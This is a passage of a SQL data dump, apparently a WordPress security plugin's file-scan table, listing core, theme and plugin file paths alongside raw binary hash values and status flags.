�G','',0,'?'),('��H�#��ým|�e','wp-includes/pomo/pomo/streams.php',0,'�����p�5yN.��&','�����p�5yN.��&','�Ό��!-�ʉ�^;�#��Ut�\n�W^���YG5','',0,'?'),('�Z��D��l�=�컫','wp-content/plugins/wordfence/views/waf/waf-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Q�Oq�W����','a\"��μ�s�f��Ѳ>Zbk�xֲ|<�A','',0,'?'),('� �6Q�R,��\r','wp-content/themes/hueman/assets/front/css/dev-font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S��8��L��b�','],��C�-�i5�Z���J��(��ΈQ$�','',0,'?'),('��s���\n�V�D�G','wp-content/themes/pine/template-parts/content-chat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0䆨ۼ�v�x�Z�z�','�-HI��6C\n�d�)���Wپe�k���','',0,'?'),('�&Gp��&U�M���','wp-content/themes/event/inc/footer-details.php',0,'��餳�/�{�xSIG','��餳�/�{�xSIG','\0idG��_�f�����|u�+D�[��Q��{','',0,'?'),('�!\"ro�ɿ��M�8�','wp-content/themes/twentynineteen/inc/icon-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�:L���o#5]Z�',')��D��7��^�ޞ��>���?}���4u����','',0,'?'),('�\"���qGX���� �','wp-content/themes/newsmag/inc/customizer/epsilon-framework/control-epsilon-slider-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�B��h|>2�%','8���A�<Q��g�<�tw��;%�AQXt�','',0,'?'),('�1�`��B���¡]�s','wp-includes/css/dist/editor/editor-styles.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/Ow�:#��v���\r',']��Ɇ���m�{�w��#ߟ^��,n����,>','',0,'?'),('�B%v6�I\"Jb��4ӡT','wp-admin/link-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�0iNj�����','�Lo(��m�ؾT���k�%<P!w�/\n�','',0,'?'),('�BK�@�~&�^��8','wp-content/themes/twentynineteen/style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t����\\�K����','�{��\Z\0�`OT�{>\0����½��� L>L�','',0,'?'),('�X֦�,�$j���','wp-content/themes/hueman/assets/front/js/jquery-plugins/jqueryCenterImages.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r8�|����~�}+��','\Z�u`fL�nc�7�RF�m���#���J~De��','',0,'?'),('�y�4�\0�#ɚKV�/b','wp-content/themes/weblog/assets/library/html5shiv/html5shiv.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';@߂�j��Z��}Cڊ�','��yk�kV���0���+��k.�e|��_/]�G','',0,'?'),('�y�T\Z*�6\'�vlA�','wp-includes/wp-includes/css/customize-preview-rtl.min.css',0,'E��?��nZ���d�-','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('���\\X����F�3B','wp-includes/wp-includes/category-template.php',0,'K������g�m�=5','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('��>�A�B�7�Sz!�e','wp-admin/includes/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8:Y�Ǐ#��;Y','�g?�.�a��q�B�ٟE�F������o��|�','',0,'?'),('���p���\Zi�䡮','wp-includes/wp-includes/class-wp-hook.php',0,'+%Yj�͑�Q �^��(','+%Yj�͑�Q �^��(','�@I*�۷�����}O�&?����8��q�','',0,'?'),('�˽\0��.sw���[��','wp-content/themes/hueman/assets/front/js/lib/jquery.flexslider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,zn�1č/6�4�','S��:T�-�,�<�N{r�P*d0HY���\\X�','',0,'?'),('��|0���O�+�]lU�','wp-includes/js/dist/a11y.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e$�(wne��\\��','�_A�q��\'�tu\0���\n��I�\\b��c# %�','',0,'?'),('���T�양�:t[��','wp-includes/Requests/Exception/HTTP/410.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�O47ߺݥ/8X!��','��9�f/3MM;#GڪWO&�tS�O\Z���Ƙ�','',0,'?'),('��]$�pWx�����','wp-content/themes/vision-lite/customize-pro/class-customize.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�aq8�6l�Ρ�q','���ԕ��Aa�F��`!J�6#��{>!\ng� y�','',0,'?'),('���l�IjU�ؿw�','wp-includes/wp-includes/Requests/Exception/HTTP/402.php',0,'`�Y�QP�\nz����G�','`�Y�QP�\nz����G�','�g��NQ �������/��� �y5������θc','',0,'?'),('�65\nN���x/\0���','wp-content/plugins/wp-cerber/assets/flags/mo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����aM7-�VD��%�','��K����v�FI���ۨ�0g��h�HV�R','',0,'?'),('�!Qz8G_��A��4','wp-content/themes/event/js/source/event-flexslider-setting.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}�\\��j@�uOb','��D�P.��2��S�H\\7t\\)�:�Be','',0,'?'),('�#`��B��xpP{XŎ','wp-includes/wp-includes/Text/Diff/Engine/xdiff.php',0,'ֹ�b�t�X8�GX','ֹ�b�t�X8�GX','�[<�0�ą��aD)tJ�h�(C�[uH}sҘi�','',0,'?'),('�%0J {��6i','wp-content/themes/hueman/option-tree/assets/css/ot-admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѓw��[� �W���$��','������?O���p�>�� �(�?�E��N)Ԥ','',0,'?'),('�)����Yh�.�;��š','wp-includes/Requests/Exception/HTTP/412.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��Iܷ��=�7��V�','S�A�4c\\D�56-��#��d*���ҽӾ�R���','',0,'?'),('�0\0����M����k\\','wp-content/themes/weblog/acmethemes/customizer/design-options/colors-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�˔E�\n �T0�\n9�','�8p�z�����@s8�\"�8,s���1Z����)','',0,'?'),('�1�eU��MV��^��','wp-admin/includes/misc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��銻~F�a8U�\'v','��j{y˔���5N�1��ޝ���2콲��','',0,'?'),('�9�FX�A}B�`�u�','wp-content/themes/weblog/acmethemes/init.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RchQ����]�f�*�','0�1B·���P�>�찅��Y�m�Na','',0,'?'),('�F_q���C�F!o4p��','wp-content/plugins/wordfence/views/scanner/scan-starter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��|#n��\0Y���','\\,���5�^�[A��:p�� �F���R��','',0,'?'),('�Go��5�G��w��','wp-content/themes/Kent/FT/plugin/options-framework/includes/class-options-interface.php',0,'������f�˰[��#','������f�˰[��#','W�����AH�zB��01L�GN�x�X0Q`','',0,'?'),('�N6?`$�Qil�L','wp-content/plugins/wp-cerber/assets/flags/pe.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:���Z�d�D�\'y�1','8����,0��M߀�����҃��WO1q�','',0,'?'),('�P�4ՓQ�)zS���','wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���M���G�ᆻ��$','*+���\0%G�;�_dE}u�-��4w�\"�','',0,'?'),('�SK�8kf�k��X�ҍ\\','wp-content/plugins/wp-cerber/assets/flags/ke.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��K�PS���P�X','�_��/�6�pp���� 6�4�zI\0ֱ�Éf','',0,'?'),('�wW� Ů�Q�⍳+��','wp-includes/wp-includes/js/customize-preview-nav-menus.min.js',0,'k�m� i13-����','k�m� i13-����','��%N�q�4��6�\n$^o����Ĝ7k��.�','',0,'?'),('��\0�>#����z(','wp-includes/bookmark.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7!ć>pP�:�ޑ\r','6̎2M̥���?��&rA���bĪ�ux^с','',0,'?'),('���� �Q2���e','wp-includes/wp-includes/js/jquery/ui/accordion.min.js',0,'���e�o-�����q','���e�o-�����q','���l�:�ͦ]�n���9cF����?�c','',0,'?'),('���������}��','wp-admin/media-upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�f���/�Pe��','�v��H1G�t�+�l�O\r�>��qc���m\\�iS','',0,'?'),('���$ժ*pn�c��^','wp-content/themes/promote/inc/kirki/assets/scss/controls/color.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��蔿�n����g���','JG*��r\0�df� >}�����\\�^��N','',0,'?'),('���~�e�,�N�e$��R','wp-content/themes/advance/inc/kirki/assets/scss/controls/switch.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���>�K�n����j','-2 }�\r^�#�k\Z����u�l��TV�. ','',0,'?'),('��}Q\0���%W��(#','wp-content/themes/gambit/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�%5� �`Dp�','~F_�~cY�N�\"���_]�zxb��s`�','',0,'?'),('���t�,�!h��O��0','wp-includes/wp-includes/js/jquery/ui/effect-pulsate.js',0,'�*\r�I�͕;t��W��','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('���d�R�OXf�f��','wp-includes/wp-includes/js/wp-embed.min.js',0,'�R%�qU�0�8}_��','�R%�qU�0�8}_��','ޚT�d����U�2#*_�D�WQT�n�I%Ǭ�','',0,'?'),('�4t�b|�4W��@K','wp-content/themes/promote/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^=\nm< ��\ne�<j�n','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('���o�g]S^�L�','wp-content/themes/cactus/screenshot.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R[��,0&�����','ڜ�-����D��{oJ���J&j���xː�V','',0,'?'),('��4�[=t��|v%M�','wp-content/themes/advance/inc/kirki/Gruntfile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','NBԒ��vu�eV�','�̂�::4�2P[�O���\'���P�����\0�L','',0,'?'),('���P�w���0�h�9','wp-includes/js/tinymce/plugins/fullscreen/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����2İ\rm}%��','3��].�BCBe��ʢ�S�( ?�Z{����','',0,'?'),('�i��J�ϖ�]��mp','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-kirki-generic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^=\nm< ��\ne�<j�n','�J������Cr�]=�k�˿�*+)��U��(','',0,'?'),('�����G�@�i�](','wp-content/themes/anima/resources/js/frontend.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0ۯ�\0%ZVB�z��%','p�]�{\n����I\\�p�l`��`�#���F�','',0,'?'),('�4Ai�ib��`ڮ~��4','wp-content/themes/newsmag/inc/customizer/settings/banners/sections.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2궞��3��l�D�','qݜ��.}�PmI�����C����\r��{���','',0,'?'),('�4u�c&�|�+\'���','wp-includes/wp-includes/images/crystal/document.png',0,'�\'^c�s���D��3T\\','�\'^c�s���D��3T\\','g�t�( Ŏ�k`5͒��J��M5���:j�','',0,'?'),('�9VF�{����','wp-content/themes/promote/inc/customizer/config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n����P�Rd_(v��','�ג��$Ԯ��(��0�oC&���/ͷ�','',0,'?'),('�;Y�Ե�.�>y]�^','wp-content/themes/anima/content/content-notfound.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�%�B#35�@�\0','��+���KG\Z٘�ΧD%��O�*��\\}_C�','',0,'?'),('�;j��|�:1/��','wp-admin/site-health-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K#uy�d>�ٲ�(H�(','o\'U����~ߡ�e�g�|�(��ې�3,�$','',0,'?'),('�;�Rw@t3�0��W\\','wp-content/themes/travel-stories/font/Open-Sans-Bold/opensansbold.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�+Չ���4�ݍ��','8��@An/8��ٷ�x�_�/��,�%f/L(��','',0,'?'),('�=�IU��c�O�G�','wp-content/plugins/wp-cerber/assets/flags/fo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�jX�?c0<G�Ia~�','��lNw�ʭ�!X�uw���_9{-]L��/ܐ','',0,'?'),('�B y�w�+���|t��','wp-includes/class-wp-http-requests-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�TP^��rbb!d�','�\Z���[Щǩ�{S.Ws:���e��\"#z�[N','',0,'?'),('�J�&_#��3S�q���','wp-admin/images/spinner-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1����2��^#�8��','��#�˒�=$c��6����� B��4�6','',0,'?'),('�N�s�ئԿ�����','wp-includes/wp-includes/class-wp-image-editor-gd.php',0,'z�RŖ���z`�T��','z�RŖ���z`�T��','� U� 5�BOu��>F���p_��}�d�.��','',0,'?'),('�V+@�0���p�ɏhi','wp-includes/rest-api/class-wp-rest-response.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�0����Sy?�','�fG]< *�:m/K<-�C�~�5�%���Sw','',0,'?'),('�Z���)_��w�\'$�X�','wp-includes/class-wp-block-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('�^Sx_?u�G�D���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��H�d9<C�ˤ���bl','K�.Bo����ࣸ�v��b�%����S~1�K��','',0,'?'),('�b~5�a���I@)*�','wp-includes/class-wp-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��eo��C�I�7#�\n��','-�h���ʠ^�F�0?�0\n�%s�ibV\\�X�','',0,'?'),('�fG<�@៝N���-','wp-admin/includes/class-wp-privacy-requests-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z|���f����?','z�\\��?��+i.��x�7�j���.i����','',0,'?'),('�x9p�2���w���B','wp-includes/ms-network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����x�����3.�','ʸ]ST���ySo$�Vgv�\"-j!QGK���','',0,'?'),('�z��a�٧:mH��U�','wp-includes/wp-includes/js/heartbeat.js',0,'\r���>������q����','\r���>������q����','��~�8��|\nvS̃M_ZD�&���K��-\Zې�','',0,'?'),('��ɌZ�(���a�q�','wp-content/themes/hueman/assets/admin/img/col-3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �eHo�=K�vX�F$','�{�4�N���é�뭅��M�מh�j�1\rqo','',0,'?'),('��-�y��[�(�<�%C','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-admin-styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�!hQk�ө��Q���`',';�ǐs��:��;Mȴ�N�x�Cd/��+�','',0,'?'),('��\\:��ڈ��)g,\\','wp-includes/images/smilies/icon_twisted.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L��v[?��+*8��;�','V�H�hK�����\n���p�����;.�&/E�','',0,'?'),('���:�f��P�g~','wp-content/themes/newsmag/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B�I)h�\\�Nʟa%K',']�ǜYt�&�YL�d�q��d�m�����G�4��K','',0,'?'),('��e��-osŕ;�/�','wp-content/themes/twentynineteen/style-editor-customizer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z]/��\'\'~�z�].Z[','�/} ��� ��ԾA9{�!���w���a��.','',0,'?'),('��!��E��S7�x����','wp-content/wflogs/rules.php',0,'LP���8ϒ��v�K��','LP���8ϒ��v�K��','\n��an Zx���£����%P$wp\n�;;�~s�','',0,'?'),('������>2\\o�)���','wp-includes/Requests/Exception/HTTP/Unknown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�dl᫁�2�A��\nW�','@���3�#\Zж/*t\r��6<X�\r�IF','',0,'?'),('���3v�U�\Z3�P�^O ','wp-admin/css/widgets-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2՝�NI 3:_(��','$�C��s���,����ɍ��2�3-��Q�a','',0,'?'),('��o4}+��8��O�','wp-content/plugins/wp-cerber/assets/flags/nc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!5�A/g��4�S�H','�.)Po�\\r�d� !NZ�Ӆ�8��8E��','',0,'?'),('��L �U���f��u�<','wp-admin/images/icons32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�P*���{>v��Uf','����?U��z��P\\��@�`�8g;\r����E','',0,'?'),('���`D\r���7 ��','wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php',0,'V���zȒ��`(�lE�','V���zȒ��`(�lE�','������⯠盍������ԵJ�\\�_�z[','',0,'?'),('���%�ʞY�x<�','wp-content/themes/capacious/assets/css/owl.carousel.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oB6� ;kI�a�{t�\0','x,��2y��g�q�~���^i���MD.#%','',0,'?'),('��<�^�a�Z�&ٚ|��','wp-includes/wp-includes/class.wp-dependencies.php',0,'�1�n��}%�3t�','�1�n��}%�3t�','���B-�[i<��6J�Zu*3��Q�q�xL\0','',0,'?'),('���o�w���Ў�696I','wp-includes/random_compat/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�!�>����=I���O','p>2���x���tn�tq��������b','',0,'?'),('��TU-c�z�g��#|','wp-content/themes/hueman/assets/front/img/demo/8-320x320.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 4����_�T��','�� ��R��m�o$ۍ��l�aX�8�J,�Po\"!','',0,'?'),('���ѩ]U�-^��\n','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-dropdown-pages-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H�0����熘y*v�','�s\\�LZ���}�[Z!so{Xl�A��Q���b�','',0,'?'),('��E��}���e�\"\'0�','wp-content/themes/promote/inc/kirki/assets/js/controls/generic.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':��c�fU�\nF��o�','ʦ�2����4{�%r���m��s9���','',0,'?'),('��=T� }��*:','wp-content/themes/hueman/assets/front/img/ie/opacity-70.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<yl4ɭ��n{�a��','�1�n����rEk�,T��\0�ъ���\'�7t�z','',0,'?'),('��[B�^�� Z�1�','wp-content/themes/twentynineteen/template-parts/content/content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v\nqYĸ`p����','�?Zt-�(D��~���$mͼ�wj�x$\n�^E�','',0,'?'),('��!%�ξ�ٜ@*�x','wp-includes/wp-includes/Requests/Exception/Transport/cURL.php',0,'�6T�g*\Z�: �x7��','�6T�g*\Z�: �x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('���Iy-�\n�ń��','wp-includes/Requests/Exception/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6T�g*\Z�: �x7��','�]���0֙8���p#�~��\\o�Ӂ=1��','',0,'?'),('�!z����>v� n���','wp-content/themes/advance/headers/part-headsingle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D+@�&�2�;e8\'��','Muh�$�Ed�J4�ib�5�˓���}m�G','',0,'?'),('�\'��v���3~?zy','wp-content/themes/promote/css/unminified/jquery.sidr.dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G��n�rH�H\0ފh','���y�Z�?8r��&U��cКg\r�','',0,'?'),('�0�`á��z��-6�','wp-content/themes/weblog/acmethemes/customizer/header-options/social-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZPs�DZL�6Eq���','+T-k$\"(�R1�8?�T�Hl�z�J�!�J�','',0,'?'),('�:=�%����M�۵','wp-includes/template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��f?Yk�EЉ��+V','a�+) �h=���%d�D�\Z/��BA��j\\�n','',0,'?'),('�BM�▍% +7�g','wp-content/themes/fastblog/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kN��傤Ha/vL��T�','�h?>8�eE�j��~)\'�/�5 ��Z��t','',0,'?'),('�I�{�?��r�]��7','wp-admin/images/resize-rtl.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nC%�Y�f���v�F.z','@St-]�z��\'+k��2��{�j�,�QN��~)� >','',0,'?'),('�Q�P� �۾Օ\0��F','wp-content/themes/hueman/functions/czr/tmpl/inputs/img-uploader-tmpl.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�⧀�Lę��E(','o�6�C�SۨO�5�h�I�B����<��l','',0,'?'),('�U�7v��������\n','wp-content/plugins/wp-cerber/assets/multi/multi.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\���ݕD��E��','�W>)pM��!��=�V#qu&,N�����+��','',0,'?'),('�`� Ƣ�Xv��{�;�','wp-includes/js/dist/edit-post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�V�\n#��?�/','� �V�$���1���J�]o*��~4nn�/�O�','',0,'?'),('�i]��WPx�*,@_�','wp-content/themes/maxbusiness/templates/homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`������pQޙ#!N','Eo^���{���9�)�)S^�2pz���2=�܈dK','',0,'?'),('���eM�y*Ҟ����','wp-includes/js/backbone.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"$2hj32U������','�c�B�CP\0�F�!���vy6�Ku�*<c�f','',0,'?'),('��@k�&X�Itǜ','wp-includes/class-wp-block-styles-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kc�����\0z�[>�\rY','��J�x\r]�|��-��u+ߏ�$�a��','',0,'?'),('��Kk�f�g��T�#�V','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�er��x��|2c��','����.C��@2��P�c֜�^n\n�\'-�v[~','',0,'?'),('��Sg���Y���O�','wp-content/themes/promote/layout/part-layout2.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^c\'�\"ř���(:�6S','}=.4\r�ru��S�9��u������H�H\"c','',0,'?'),('����n�\n�\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'-H�f���<1','A5�Y9���\0��O�tq�ЖL\\�}�a��&�','',0,'?'),('���g���[z�\0ή�','wp-content/plugins/wordfence/modules/login-security/views/page/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��MQ�@��Ǯ���I','����~�r�b�wTN�s��;3f��B���)A','',0,'?'),('��� ���*1�%{�','wp-includes/wp-includes/js/tw-sack.js',0,'��������9>���','��������9>���','{�n]�\0ֈ��n�\r����<�w˷X)���:','',0,'?'),('���t�V��<��C��','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';HoĴ`��׳m�%�','�(��l]�h��Юa y�fh��0v\'u�vm�','',0,'?'),('��&�|A���B㍽','wp-content/themes/promote/category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)��?����M�>','���#�������/��{��ǍM)ȟ�','',0,'?'),('��\\-\\��f�t�KD�s','wp-includes/rest-api/endpoints/class-wp-rest-plugins-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����� v��d','W�Y�0����2w�� 5�O���zm� ���^','',0,'?'),('��w��i.�w�(M;0D','wp-content/plugins/akismet/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9��|���2-�#�','�J�S�\\<�Cޏ�=s\'WI&\Z�(���vaTo','',0,'?'),('��0��l�P�EI�\0','wp-content/themes/Yegor/FT/js/colorset.js',0,'-�*Ј��`��_��','-�*Ј��`��_��','o�$�V�~,�e�qה2�$3���H�TZ���#�','',0,'?'),('��!?M�\"Q��e>��','wp-content/plugins/wp-cerber/assets/nexus.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',\"����tw�L�','clY`��-�]N�U��~���uA1W�R�j�XR�','',0,'?'),('���ws� ��+���C\'','wp-content/themes/twentytwenty/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�l���Ѽ &.���','�_7�����\\�7�Hms��.:[)��dM�','',0,'?'),('�.��x�Q}�t\np�','wp-includes/rest-api/endpoints/class-wp-rest-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�q͊����tF����','�,��Ca�� NÉ���vK�hWIQ�xk|�Q','',0,'?'),('�7*���\"{��\n�K<','wp-admin/includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��t{0o�ޖ','7<NoQF���\0�$�j�aϤ m���\r�i��','',0,'?'),('�?�8������Z��N�','wp-includes/ID3/module.tag.lyrics3.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�\"[�װ���A�>A','�V*��&)��~��d�}K�,����E�s�','',0,'?'),('�GP�)4��烛�ѳ','wp-includes/wp-includes/class-wp-fatal-error-handler.php',0,'����-����v�','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('�T�\\8���Fqe��\r`','wp-content/themes/capacious/inc/customizer/capacious-theme-options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P��!U��[4��e�',')�q�4#���PёIY,^��9��c�_|\"g','',0,'?'),('�X*����VL �_�','wp-includes/css/dist/block-library/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0}3�*�?�v�+,\"','&tT=����ȼitg`^�5����2G��Vcg<','',0,'?'),('�d�X߬xg{9�h�a','wp-content/themes/newsmag/inc/widgets/posts_list_vertical/layouts/posts_list_vertical.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')2���OL��h��','26��U^�2�m�V5u�l�7�\rd�;�?�o-','',0,'?'),('�j��I���<��iU','wp-includes/category-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K������g�m�=5','S����.�k��Sgn8 �����H\"�','',0,'?'),('�s��c��d�\n-��%qW','wp-content/themes/wp-barrister/library/js/imagesloaded.pkgd.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xk2�;K��>H�p�','�8!#8�&,��O���52rU�܆�7~$|��','',0,'?'),('�t�wB��jAǍ���','wp-content/themes/pine/img/layout/404-bg.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����7��Υs��1','�Q����^m+�t�nH�_-/˶��IΉ?','',0,'?'),('���&���}?�\Zs`�','wp-includes/js/wp-sanitize.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�f05��}$��]���','�Ea5/qJ�Xo+#x��[�X86)3�ن>��','',0,'?'),('��2u�\"<g�@�f�%','wp-content/plugins/wp-cerber/assets/flags/ki.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����K���ȶ�','�\"�&9ʈ��7�lZ��P�퇢 �j�/','',0,'?'),('���Q��Ws�A7d\n','wp-admin/css/site-icon-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`_?ބ=�|���+�d�','���M���S����>j/���\"K%qޣ��~','',0,'?'),('��Ψ�J�}�9��:C�','wp-content/themes/promote/inc/kirki/assets/scss/controls/radio.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','YTЖb�%�����','K��_TJ؟lj[�C屋xE��>[`�^�','',0,'?'),('��e�\\��1�tƋ�< 